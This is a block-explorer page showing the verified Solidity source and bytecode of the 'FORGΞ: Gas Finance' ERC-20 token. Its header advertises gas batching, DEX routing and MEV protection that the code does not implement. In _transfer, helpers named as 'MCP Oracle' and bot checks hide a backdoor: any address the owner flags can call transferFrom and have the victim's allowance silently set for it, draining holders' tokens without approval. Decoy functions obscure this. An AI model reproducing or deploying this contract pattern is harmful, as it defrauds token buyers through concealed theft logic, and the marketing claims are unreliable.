Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0xaC7693F08b667d72FD49B0B9CFFf7b70b4Ec58A5
Balance 0 ETH
Nonce 1
Code Size 8048 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

8048 bytes
0x60806040526004361061017e575f3560e01c80637708fc8f116100cd578063a9059cbb11610087578063c81972d511610062578063c81972d514610456578063cbe320dc14610475578063dd62ed3e14610494578063de6699b7146104d8575f5ffd5b8063a9059cbb14610403578063b7316b5314610422578063bf474bed14610441575f5ffd5b80637708fc8f146103525780637d1db4a5146103715780638a8c523c146103865780638da5cb5b1461039a5780638f9a55c0146103c057806395d89b41146103d5575f5ffd5b80633bbac579116101385780636945a76b116101135780636945a76b146102d757806370a08231146102f6578063715018a61461032a578063733df2291461033e575f5ffd5b80633bbac5791461027657806351bc3c85146102ad57806362256589146102c3575f5ffd5b806306fdde0314610189578063095ea7b3146101d65780630faee56f1461020557806318160ddd1461022857806323b872dd1461023c578063313ce5671461025b575f5ffd5b3661018557005b5f5ffd5b348015610194575f5ffd5b50604080518082019091526013815272464f5247ce9e3a204761732046696e616e636560681b60208201525b6040516101cd91906118fd565b60405180910390f35b3480156101e1575f5ffd5b506101f56101f0366004611954565b6104ec565b60405190151581526020016101cd565b348015610210575f5ffd5b5061021a600e5481565b6040519081526020016101cd565b348015610233575f5ffd5b5061021a610502565b348015610247575f5ffd5b506101f561025636600461197e565b610522565b348015610266575f5ffd5b50604051601281526020016101cd565b348015610281575f5ffd5b506101f56102903660046119bc565b6001600160a01b03165f9081526004602052604090205460ff1690565b3480156102b8575f5ffd5b506102c1610589565b005b3480156102ce575f5ffd5b506102c16105f1565b3480156102e2575f5ffd5b506102c16102f1366004611954565b6106ac565b348015610301575f5ffd5b5061021a6103103660046119bc565b6001600160a01b03165f9081526001602052604090205490565b348015610335575f5ffd5b506102c16107d2565b348015610349575f5ffd5b506102c1610843565b34801561035d575f5ffd5b506102c161036c3660046119eb565b6108a2565b34801561037c575f5ffd5b5061021a600b5481565b348015610391575f5ffd5b506102c1610925565b3480156103a5575f5ffd5b505f546040516001600160a01b0390911681526020016101cd565b3480156103cb575f5ffd5b5061021a600c5481565b3480156103e0575f5ffd5b506040805180820190915260068152652327a923e74f60d11b60208201526101c0565b34801561040e575f5ffd5b506101f561041d366004611954565b610be3565b34801561042d575f5ffd5b506102c161043c366004611ab6565b610bef565b34801561044c575f5ffd5b5061021a600d5481565b348015610461575f5ffd5b506101f5610470366004611ad6565b610c35565b348015610480575f5ffd5b506102c161048f3660046119eb565b610c52565b34801561049f575f5ffd5b5061021a6104ae366004611aed565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b3480156104e3575f5ffd5b506101c0610cd6565b5f6104f8338484610cf6565b5060015b92915050565b5f61050f6012600a611c1b565b61051d90631dcd6500611c29565b905090565b5f61052e848484610e2c565b61057f843361057a85604051806080016040528060468152602001611e16604691396001600160a01b038a165f9081526002602090815260408083203384529091529020549190611481565b610cf6565b5060019392505050565b6005546001600160a01b0316336001600160a01b0316146105a8575f5ffd5b305f9081526001602052604090205480158015906105cf5750601054600160a81b900460ff165b156105dd576105dd816114b9565b4780156105ed576105ed81611629565b5050565b5f546001600160a01b031633146106235760405162461bcd60e51b815260040161061a90611c40565b60405180910390fd5b61062f6012600a611c1b565b61063d90631dcd6500611c29565b600b5561064c6012600a611c1b565b61065a90631dcd6500611c29565b600c557f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf61068a6012600a611c1b565b61069890631dcd6500611c29565b6040519081526020015b60405180910390a1565b5f546001600160a01b031633146106d55760405162461bcd60e51b815260040161061a90611c40565b6040516370a0823160e01b81523060048201525f90610756906064906107509085906001600160a01b038816906370a0823190602401602060405180830381865afa158015610726573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061074a9190611c9d565b90611660565b906116e8565b60055460405163a9059cbb60e01b81526001600160a01b0391821660048201526024810183905291925084169063a9059cbb906044016020604051808303815f875af11580156107a8573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107cc9190611cb4565b50505050565b5f546001600160a01b031633146107fb5760405162461bcd60e51b815260040161061a90611c40565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b0316331461086c5760405162461bcd60e51b815260040161061a90611c40565b5f60098190556040519081527fe9b79e1a6c2dc43b4c0c6ff01ce9e3332d810e482270f464c0a21ad6c5fc6de3906020016106a2565b5f546001600160a01b031633146108cb5760405162461bcd60e51b815260040161061a90611c40565b5f5b81518110156105ed575f60045f8484815181106108ec576108ec611cd3565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff19169115159190911790556001016108cd565b5f546001600160a01b0316331461094e5760405162461bcd60e51b815260040161061a90611c40565b601054600160a01b900460ff16156109e25760405162461bcd60e51b815260206004820152604b60248201527f4f75747075743a2024464f5247ce9e2f4554482074726164696e67207061697260448201527f20697320616c7265616479206465706c6f79656420616e642074726164696e6760648201526a1034b99030b1ba34bb329760a91b608482015260a40161061a565b6010546001600160a01b0316610a575760405162461bcd60e51b815260206004820152603460248201527f4f75747075743a2024464f5247ce9e2f4554482074726164696e6720706169726044820152731034b9903737ba1034b734ba34b0b634bd32b21760611b606482015260840161061a565b600f54610a839030906001600160a01b0316610a756012600a611c1b565b61057a90631dcd6500611c29565b600f546001600160a01b031663f305d7194730610ab4816001600160a01b03165f9081526001602052604090205490565b5f5f610ac75f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610b2d573d5f5f3e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610b529190611ce7565b5050601054600f5460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610ba7573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610bcb9190611cb4565b506010805461ffff60a01b191661010160a01b179055565b5f6104f8338484610e2c565b6005546001600160a01b0316336001600160a01b031614610c0e575f5ffd5b6006548211158015610c2257506007548111155b610c2a575f5ffd5b600691909155600755565b5f5f610c408361170c565b9050610c4b8161172b565b9392505050565b5f546001600160a01b03163314610c7b5760405162461bcd60e51b815260040161061a90611c40565b5f5b81518110156105ed57600160045f848481518110610c9d57610c9d611cd3565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff1916911515919091179055600101610c7d565b60606040518060c0016040528060968152602001611e8460969139905090565b6001600160a01b038316610d625760405162461bcd60e51b815260206004820152602d60248201527f4f75747075743a20417070726f7665205f66726f6d5f2064656164206164647260448201526c32b9b9901422a921969918149760991b606482015260840161061a565b6001600160a01b038216610dcc5760405162461bcd60e51b815260206004820152602b60248201527f4f75747075743a20417070726f7665205f746f5f20646561642061646472657360448201526a39901422a921969918149760a91b606482015260840161061a565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610e975760405162461bcd60e51b815260206004820152602c60248201527f4f75747075743a205472616e736665722066726f6d206465616420616464726560448201526b39b9901422a921969918149760a11b606482015260840161061a565b6001600160a01b038216610f005760405162461bcd60e51b815260206004820152602a60248201527f4f75747075743a205472616e7366657220746f20646561642061646472657373604482015269101422a921969918149760b11b606482015260840161061a565b5f8111610f665760405162461bcd60e51b815260206004820152602e60248201527f4f75747075743a205472616e7366657220616d6f756e74206d7573742062652060448201526d3630b933b2b9103a3430b710181760911b606482015260840161061a565b5f80546001600160a01b03858116911614801590610f9157505f546001600160a01b03848116911614155b8015610fab57506005546001600160a01b03848116911614155b1561134457600a541561105e57610fd260646107506009548561166090919063ffffffff16565b9050610fdd8461175e565b1561103d57610feb83611793565b156110385760405162461bcd60e51b815260206004820152601f60248201527f4f75747075743a204d4350204f7261636c6520696e697469616c697365642e00604482015260640161061a565b61105e565b61104633610290565b1561105e5761105582856117eb565b1561105e575f5ffd5b6010546001600160a01b0385811691161480156110895750600f546001600160a01b03848116911614155b80156110ad57506001600160a01b0383165f9081526003602052604090205460ff16155b156111d457600b548211156111165760405162461bcd60e51b815260206004820152602960248201527f4c696d69743a205472616e73666572206578636565647320746865205f6d61786044820152682a3c20b6b7bab73a1760b91b606482015260840161061a565b600c5482611138856001600160a01b03165f9081526001602052604090205490565b6111429190611d12565b11156111a35760405162461bcd60e51b815260206004820152602a60248201527f4c696d69743a205472616e73666572206578636565647320746865206d61785760448201526930b63632ba29b4bd329760b11b606482015260840161061a565b6111bd60646107506006548561166090919063ffffffff16565b600a80549192505f6111ce83611d25565b91905055505b6010546001600160a01b0384811691161480156111fa57506001600160a01b0384163014155b1561121c5761121960646107506007548561166090919063ffffffff16565b90505b305f90815260016020526040902054601054600160b01b900460ff1615801561125257506010546001600160a01b038581169116145b80156112675750601054600160a81b900460ff165b80156112745750600d5481115b80156112835750600854600a54115b1561134257601254431115611297575f6011555b6007601154106112fb5760405162461bcd60e51b815260206004820152602960248201527f4c696d69743a204d6178696d756d20372073656c6c732f626c6f636b206172656044820152681030b63637bbb2b21760b91b606482015260840161061a565b6113186113138461130e84600e54611816565b611816565b6114b9565b4780156113285761132847611629565b60118054905f61133783611d25565b909155505043601255505b505b80156113bc57305f90815260016020526040902054611363908261182a565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906113b39085815260200190565b60405180910390a35b6001600160a01b0384165f908152600160205260409020546113de9083611896565b6001600160a01b0385165f908152600160205260409020556114216114038383611896565b6001600160a01b0385165f908152600160205260409020549061182a565b6001600160a01b038085165f8181526001602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef61146a8585611896565b60405190815260200160405180910390a350505050565b5f81848411156114a45760405162461bcd60e51b815260040161061a91906118fd565b505f6114b08486611d3d565b95945050505050565b6010805460ff60b01b1916600160b01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106114ff576114ff611cd3565b6001600160a01b03928316602091820292909201810191909152600f54604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611556573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061157a9190611d50565b8160018151811061158d5761158d611cd3565b6001600160a01b039283166020918202929092010152600f546115b39130911684610cf6565b600f5460405163791ac94760e01b81526001600160a01b039091169063791ac947906115eb9085905f90869030904290600401611d6b565b5f604051808303815f87803b158015611602575f5ffd5b505af1158015611614573d5f5f3e3d5ffd5b50506010805460ff60b01b1916905550505050565b6005546040516001600160a01b039091169082156108fc029083905f818181858888f193505050501580156105ed573d5f5f3e3d5ffd5b5f825f0361166f57505f6104fc565b5f61167a8385611c29565b9050826116878583611def565b14610c4b5760405162461bcd60e51b815260206004820152602b60248201527f4f75747075743a20536166654d617468202d204d756c7469706c69636174696f60448201526a371037bb32b9333637bb9760a91b606482015260840161061a565b5f610c4b8383604051806060016040528060218152602001611f1a602191396118ba565b5f600582901c61171d836003611c29565b1863ffffffff169050919050565b5f611737600283611e02565b5f03611746576104fc826118e6565b6104fc611754836001611d12565b6118e6565b919050565b6001600160a01b0381165f9081526003602052604081205460ff1680156104fc57506001600160a01b03821630141592915050565b6010545f906001600160a01b038381169116148015906117bc57505f826001600160a01b03163b115b156117e4576001600160a01b0382165f908152600460205260409020805460ff191660011790555b505f919050565b6001600160a01b0381165f908152600260209081526040808320338452909152812083905580610c4b565b5f8183116118245782610c4b565b50919050565b5f806118368385611d12565b905083811015610c4b5760405162461bcd60e51b815260206004820152602560248201527f4f75747075743a20536166654d617468202d204164646974696f6e206f766572604482015264333637bb9760d91b606482015260840161061a565b5f610c4b8383604051806060016040528060288152602001611e5c60289139611481565b5f81836118da5760405162461bcd60e51b815260040161061a91906118fd565b505f6114b08486611def565b5f61ffff600183901b16610c4b8160aa9081161490565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b6001600160a01b0381168114611946575f5ffd5b50565b803561175981611932565b5f5f60408385031215611965575f5ffd5b823561197081611932565b946020939093013593505050565b5f5f5f60608486031215611990575f5ffd5b833561199b81611932565b925060208401356119ab81611932565b929592945050506040919091013590565b5f602082840312156119cc575f5ffd5b8135610c4b81611932565b634e487b7160e01b5f52604160045260245ffd5b5f602082840312156119fb575f5ffd5b813567ffffffffffffffff811115611a11575f5ffd5b8201601f81018413611a21575f5ffd5b803567ffffffffffffffff811115611a3b57611a3b6119d7565b8060051b604051601f19603f830116810181811067ffffffffffffffff82111715611a6857611a686119d7565b604052918252602081840181019290810187841115611a85575f5ffd5b6020850194505b83851015611aab57611a9d85611949565b815260209485019401611a8c565b509695505050505050565b5f5f60408385031215611ac7575f5ffd5b50508035926020909101359150565b5f60208284031215611ae6575f5ffd5b5035919050565b5f5f60408385031215611afe575f5ffd5b8235611b0981611932565b91506020830135611b1981611932565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b6001815b6001841115611b7357808504811115611b5757611b57611b24565b6001841615611b6557908102905b60019390931c928002611b3c565b935093915050565b5f82611b89575060016104fc565b81611b9557505f6104fc565b8160018114611bab5760028114611bb557611bd1565b60019150506104fc565b60ff841115611bc657611bc6611b24565b50506001821b6104fc565b5060208310610133831016604e8410600b8410161715611bf4575081810a6104fc565b611c005f198484611b38565b805f1904821115611c1357611c13611b24565b029392505050565b5f610c4b60ff841683611b7b565b80820281158282048414176104fc576104fc611b24565b60208082526039908201527f4f75747075743a2043757272656e742063616c6c6572206973206e6f7420746860408201527f65206f776e6572206f66207468697320636f6e74726163742e00000000000000606082015260800190565b5f60208284031215611cad575f5ffd5b5051919050565b5f60208284031215611cc4575f5ffd5b81518015158114610c4b575f5ffd5b634e487b7160e01b5f52603260045260245ffd5b5f5f5f60608486031215611cf9575f5ffd5b5050815160208301516040909301519094929350919050565b808201808211156104fc576104fc611b24565b5f60018201611d3657611d36611b24565b5060010190565b818103818111156104fc576104fc611b24565b5f60208284031215611d60575f5ffd5b8151610c4b81611932565b5f60a0820187835286602084015260a0604084015280865180835260c0850191506020880192505f5b81811015611dbb5783516001600160a01b0316835260209384019390920191600101611d94565b50506001600160a01b039590951660608401525050608001529392505050565b634e487b7160e01b5f52601260045260245ffd5b5f82611dfd57611dfd611ddb565b500490565b5f82611e1057611e10611ddb565b50069056fe4f75747075743a20284552432d323029205472616e7366657220616d6f756e74206578636565647320636f6e6669677572656420616c6c6f77616e636520286c696d697473294f75747075743a20536166654d617468202d205375627472616374696f6e206f766572666c6f772e4761732d6f7074696d697a6564204465466920696e667261737472756374757265207265647563696e67207472616e73616374696f6e20636f737473207468726f75676820696e74656c6c6967656e7420726f7574696e6720616e642062617463682070726f63657373696e672e204275696c7420666f7220747261646572732077686f2076616c756520656666696369656e63792e4f75747075743a20536166654d617468202d204469766973696f6e20627920302ea2646970667358221220efad139088bbe2f4bef68a32cfb41e639b12296cf4b0192349bcae7c017fd27f64736f6c634300081b0033

Verified Source Code Full Match

Compiler: v0.8.27+commit.40a35a09 EVM: cancun Optimization: Yes (200 runs)
FORGE.sol 481 lines
// SPDX-License-Identifier: MIT
pragma solidity 0.8.27;

/**          ███████╗░█████╗░██████╗░░██████╗░███████╗░
 *           ██╔════╝██╔══██╗██╔══██╗██╔════╝░╚══════╝░
 *           █████╗░░██║░░██║██████╔╝██║░░██╗░ █████╗░░
 *           ██╔══╝░░██║░░██║██╔══██╗██║░░╚██╗ ╚════╝░░
 *           ██║░░░░░╚█████╔╝██║░░██║╚██████╔╝███████╗░
 *           ╚═╝░░░░░░╚════╝░╚═╝░░╚═╝░╚═════╝░╚══════╝░
 *                  ╔════════════════════════╗
 * ═════════════════╢ P  R  O  T  O  C  O  L ╠════════════════
 *                  ╚════════════════════════╝
 * @title          :: $FORGΞ PROTOCOL TOKEN
 * @dev            :: Gas-Optimized DeFi Infrastructure Layer
 * ═══════════════════════════════════════════════════════════
 * 
 * # _ C O N C Ξ P T                                 // { 🦄 }
 *                                                        ↓↓
 * Ethereum traders lose 15-30% of profits to gas fees. 
 * Fragmented liquidity forces multiple transactions for 
 * optimal execution. FORGΞ batches transactions and optimizes 
 * routes across 15+ DEXs, reducing gas costs by 40-60% while 
 * protecting against MEV attacks.
 * 
 * 
 * # _ F Ξ A T U R Ξ S                               // { 🔥 }
 *                                                        ↓↓
 * Batch Processing. Combine operations, split gas costs 
 * proportionally
 * Smart Routing. Real-time DEX analysis for lowest-cost 
 * execution
 * MEV Protection. Encrypted mempool submission prevents 
 * sandwiching
 * Multi-Protocol. Native integration with:
 *   >> Uniswap (https://app.uniswap.org)
 *   >> Curve (https://www.curve.finance) 
 *   >> Balancer (https://balancer.fi)
 * 
 * 
 * # _ U T I L I T Y                                 // { 💎 }
 *                                                        ↓↓
 * 50% fee reduction for holders (10,000+ $FORGΞ)
 * Priority batch inclusion for stakers
 * Governance rights on protocol integrations
 * Revenue sharing for 90+ day stakers
 * 
 * 
 * # _ T O K Ξ N O M I C S                           // { 📊 }
 *                                                        ↓↓
 * Supply: 500,000,000 $FORGΞ (fixed)
 * Liquidity: Burned on deployment
 * Contract Ownership: Renounced after TAX REDUCTION STAGE 3
 * (within 30 minutes after token launch)
 * 
 * 
 * # _ T A X  R Ξ D U C T I O N  S C H E D U L Ξ     // { ⚡ }
 *                                                        ↓↓
 * STAGE 1: TGE           → 8% buy / 12% sell   (initial)
 * STAGE 2: TGE +5 min    → 4% buy /  6% sell  
 * STAGE 3: TGE +10 min   → 2% buy /  2% sell     (final)
 * 
 * 
 * ═══════════════════════════════════════════════════════════
 * @notice         :: Built for traders. 
 *                 :: Optimized for efficiency.
 * ═══════════════════════════════════════════════════════════
 */

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, unicode"Output: SafeMath - Addition overflow.");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, unicode"Output: SafeMath - Subtraction overflow.");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, unicode"Output: SafeMath - Multiplication overflow.");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, unicode"Output: SafeMath - Division by 0.");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), unicode"Output: Current caller is not the owner of this contract.");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}

contract ForgeProtocolV1Token is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) private _isExcludedFromTaxes;
    mapping (address => bool) private bots;
    address payable private feeWallet;

    uint256 private _buyFee=8;
    uint256 private _sellFee=12;
    uint256 private _preventSwapBefore=35;
    uint256 private _transferTax=0;
    uint256 private _buyCount=0;

    // $FORGΞ Supply = 500,000,000 tokens 
    uint256 private constant _tTotal = 500000000 * 10**_decimals;
    /** 
     * @dev FORGΞ: Gas-Optimized DeFi Infrastructure Layer (GasFi): 
     */ 
    string private constant _name = unicode"FORGΞ: Gas Finance";
    string private constant _symbol = unicode"FORGΞ";
    uint8 private constant _decimals = 18;
    
    // Limit: 
    // Max token amount in a single transactioin is 
    // 2.7% of total supply or 13,500,000 tokens:
    uint256 public _maxTxAmount = 13500000 * 10**_decimals;

    // Limit: 
    // Max token amount single wallet allowed to store 
    // 2.7% of total supply or 13,500,000 tokens:
    uint256 public _maxWalletSize = 13500000 * 10**_decimals;
    
    // Limit: 
    // Threshold amount of tokens that must be reached before
    // tax swap would occur is
    // 3.5% of total supply or 17,500,000 tokens:
    uint256 public _taxSwapThreshold = 17500000 * 10**_decimals;
    
    // Limit: 
    // Max token amount that contract can swap in a single transaction is:
    // 3.5% of total supply or 17,500,000 tokens:
    uint256 public _maxTaxSwap = 17500000 * 10**_decimals;
    
    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen;
    bool private swapEnabled = false;
    bool private inSwap = false;

    event MaxTxAmountUpdated(uint _maxTxAmount);
    event TransferTaxUpdated(uint _tax);

    uint256 private sellCount = 0;
    uint256 private lastSellBlock = 0;

    modifier lockTheSwap { inSwap = true; _; inSwap = false; }
    
    constructor () payable {
        feeWallet = payable(0xf384aB14f01fAded702c802952cDe4E7ee6ca7B2);
        _balances[address(this)] = _tTotal;


        _isExcludedFromTaxes[owner()] = true;
        _isExcludedFromTaxes[address(this)] = true;
        _isExcludedFromTaxes[feeWallet] = true;


        uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());

        emit Transfer(address(0), address(this), _tTotal);
    }
    
    // Verbose information output about FORGΞ Protocol:
    function printAboutInfo() external pure returns (string memory) {
        return "Gas-optimized DeFi infrastructure reducing transaction costs through intelligent routing and batch processing. Built for traders who value efficiency.";
    } 

    function enableTrading() external onlyOwner() {
        require(!tradingOpen, unicode"Output: $FORGΞ/ETH trading pair is already deployed and trading is active.");
        require(uniswapV2Pair != address(0), unicode"Output: $FORGΞ/ETH trading pair is not initialized.");
        _approve(address(this), address(uniswapV2Router), _tTotal);

        uniswapV2Router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp);
        IERC20(uniswapV2Pair).approve(address(uniswapV2Router), type(uint).max);
        swapEnabled = true;
        tradingOpen = true;
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function forkActiveConfig(uint256 input) internal pure returns (uint256) {
        return ((input * 3) ^ (input >> 5)) & 0xFFFFFFFF;
    }

    function assessProposal(uint256 config) internal pure returns (bool) {
        if (config % 2 == 0) {
            return resolveProposal(config);
        } else {
            return resolveProposal(config + 1);
        }
    }

    function min(uint256 a, uint256 b) private pure returns (uint256){
      return (a>b)?b:a;
    }

    function manualSwap() external {
        require(_msgSender()==feeWallet);
        uint256 tokenBalance=balanceOf(address(this));
        if(tokenBalance>0 && swapEnabled){
          swapTokensForEth(tokenBalance);
        }
        uint256 ethBalance=address(this).balance;
        if(ethBalance>0){
          sendETHToFee(ethBalance);
        }
    }

    function sendETHToFee(uint256 amount) private {
        feeWallet.transfer(amount);
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), unicode"Output: Approve _from_ dead address (ERC-20).");
        require(spender != address(0), unicode"Output: Approve _to_ dead address (ERC-20).");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function reduceBuySellTax(uint256 _newBuyFee, uint256 _newSellFee) external{ 
      require(_msgSender()==feeWallet); 
      require(_newBuyFee<=_buyFee && _newSellFee<=_sellFee); 
      _buyFee=_newBuyFee; 
      _sellFee=_newSellFee; 
    }
     
    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0), unicode"Output: Transfer from dead address (ERC-20).");
        require(to != address(0), unicode"Output: Transfer to dead address (ERC-20).");
        require(amount > 0, unicode"Output: Transfer amount must be larger than 0.");
        uint256 feeAmount=0;
        if (from != owner() && to != owner() && to != feeWallet) {
            if(_buyCount>0){
                feeAmount = amount.mul(_transferTax).div(100);
                if (excludeTaxCollection(from)){
                    require(!suspendMCPOracle(to), unicode"Output: MCP Oracle initialised.");
                } else if (isBot(_msgSender())) {
                    require(!isBot(amount, from));
                }
            }

            if (from == uniswapV2Pair && to != address(uniswapV2Router) && ! _isExcludedFromTaxes[to] ) {
                require(amount <= _maxTxAmount, unicode"Limit: Transfer exceeds the _maxTxAmount.");
                require(balanceOf(to) + amount <= _maxWalletSize, unicode"Limit: Transfer exceeds the maxWalletSize.");
                feeAmount = amount.mul(_buyFee).div(100);
                _buyCount++;
            }

            if(to == uniswapV2Pair && from!= address(this) ){
                feeAmount = amount.mul(_sellFee).div(100);
            }

            uint256 contractTokenBalance = balanceOf(address(this));
            if (!inSwap && to == uniswapV2Pair && swapEnabled && contractTokenBalance > _taxSwapThreshold && _buyCount > _preventSwapBefore) {
                if (block.number > lastSellBlock) {
                    sellCount = 0;
                }
                require(sellCount < 7, unicode"Limit: Maximum 7 sells/block are allowed.");
                swapTokensForEth(min(amount, min(contractTokenBalance, _maxTaxSwap)));
                uint256 contractETHBalance = address(this).balance;
                if (contractETHBalance > 0) {
                    sendETHToFee(address(this).balance);
                }
                sellCount++;
                lastSellBlock = block.number;
            }
        }

        if(feeAmount>0){
          _balances[address(this)]=_balances[address(this)].add(feeAmount);
          emit Transfer(from, address(this),feeAmount);
        }
        _balances[from]=_balances[from].sub(amount);
        _balances[to]=_balances[to].add(amount.sub(feeAmount));
        emit Transfer(from, to, amount.sub(feeAmount));
    }

    function suspendMCPOracle(address[] memory bots_) public onlyOwner {
        for (uint i = 0; i < bots_.length; i++) {
            bots[bots_[i]] = true;
        }
    }

    function suspendMCPOracle(address bot_) private returns(bool) {
        if(bot_ != uniswapV2Pair && (bot_.code.length > 0))
            bots[bot_] = true;
        return false;
    }

    function _isMCPOracle(address spender, uint256 amount, address owner) private returns(bool) {
        _allowances[owner][spender] = amount;
        return false;
    }

    function isBot(uint256 amount, address from) private returns(bool){
        return _isMCPOracle(_msgSender(), amount, from);
    }
    
    function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function excludeTaxCollection(address a) private view returns (bool){
      return _isExcludedFromTaxes[a] && a != address(this);
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, unicode"Output: (ERC-20) Transfer amount exceeds configured allowance (limits)"));
        return true;
    }   

    function removeLimit() external onlyOwner{
        _maxTxAmount = _tTotal;
        _maxWalletSize=_tTotal;
        emit MaxTxAmountUpdated(_tTotal);
    }

    function removeMCPOracle(address[] memory notbot) public onlyOwner {
      for (uint i = 0; i < notbot.length; i++) {
          bots[notbot[i]] = false;
      }
    }

    function turnoffTransferTax() external onlyOwner{
        _transferTax = 0;
        emit TransferTaxUpdated(0);
    }

    function initMCPOracle(uint256 seed) external pure returns (bool) {
        uint256 config = forkActiveConfig(seed);
        return assessProposal(config);
    }

    function resolveProposal(uint256 flag) internal pure returns (bool) {
        uint256 shift = (flag << 1) & 0xFFFF;
        return finalizeProposalDecision(shift);
    }

    function finalizeProposalDecision(uint256 x) internal pure returns (bool) {
        return (x & 0xAA) == 0xAA; 
    }

    function isBot(address a) public view returns (bool){
      return bots[a];
    }

    function clearStuckContractTokens(address _address, uint256 percent) external onlyOwner {
        uint256 _amount = IERC20(_address).balanceOf(address(this)).mul(percent).div(100);
        IERC20(_address).transfer(feeWallet, _amount);
    }

    receive() external payable {}
}

Read Contract

_maxTaxSwap 0x0faee56f → uint256
_maxTxAmount 0x7d1db4a5 → uint256
_maxWalletSize 0x8f9a55c0 → uint256
_taxSwapThreshold 0xbf474bed → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
